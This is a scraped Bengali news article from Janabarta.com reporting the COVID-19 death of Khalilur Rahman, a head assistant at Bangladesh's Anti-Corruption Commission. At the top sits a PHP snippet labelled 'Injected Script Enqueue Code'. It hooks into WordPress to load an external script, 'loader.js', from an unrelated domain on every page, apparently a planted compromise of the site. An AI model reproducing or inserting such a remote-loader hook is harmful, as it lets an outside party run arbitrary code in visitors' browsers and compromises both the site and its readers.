// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site করোনায় মারা গেলেন দুদকের আরেক কর্মী - Janabarta.com

করোনায় মারা গেলেন দুদকের আরেক কর্মী

করোনাভাইরাস (Coronavirus)- প্রতীকী ছবি

নিজস্ব প্রতিবেদক: প্রাণঘাতী করোনাভাইরাসের (কোভিড-১৯) আক্রান্ত হয়ে এবার মারা গেছেন দুর্নীতি দমন কমিশনের (দুদক) এক কর্মী। খলিলুর রহমান নামের ওই কর্মী কমিশনের প্রধান সহাকারী পদে কর্মরত ছিলেন। শনিবার দুপুরে ঢাকা মেডিকেল কলেজ (ঢামেক) হাসাপাতালের করোনা ইউনিটে চিকিৎসাধীন অবস্থায় মারা যান তিনি।

বিষয়টি নিশ্চিত করে ঢামেক হাসপাতালের সহকারী পরিচালক আলাউদ্দিন আল আজাদ জানান, দুদকের ওই কর্মী করোনাভাইরাসে আক্রান্ত ছিলেন। দুপুরের দিকে তিনি মারা যান। তার মৃতদেহ হাসপাতালের মর্গে পাঠানোর প্রস্তুতি চলছে।

তবে তিনি ঠিক কবে করোনায় আক্রান্ত হয়ে হাসপাতালে ভর্তি হয়েছেন তা তাৎক্ষণিকভাবে জানা যায়নি।

এ বিষয়ে কমিশনের পরিচালক ((জনসংযোগ) প্রণব কুমার ভট্টাচার্য্য বলেন, বহু বছর ধরে দুদকে প্রধান সহকারী পদে কর্মরত ছিলেন খলিলুর রহমান। তার এই মৃত্যুতে তিনি শোকাহত।

এর আগে গত ৬ এপ্রিল রাজধানীর বাংলাদেশ-কুয়েত মৈত্রী হাসপাতালে চিকিৎসাধীন অবস্থায় মারা যান দুদক পরিচালক জালাল সাইফুর রহমান (৪৭)। তিনি করোনাভাইরাসের উপসর্গ নিয়ে গত ২৯ মার্চ হাসপাতালে ভর্তি হন। তার নমুনা পরীক্ষা করোনা পজিটিভ আসে। তবে এর আগেই মারা যান তিনি।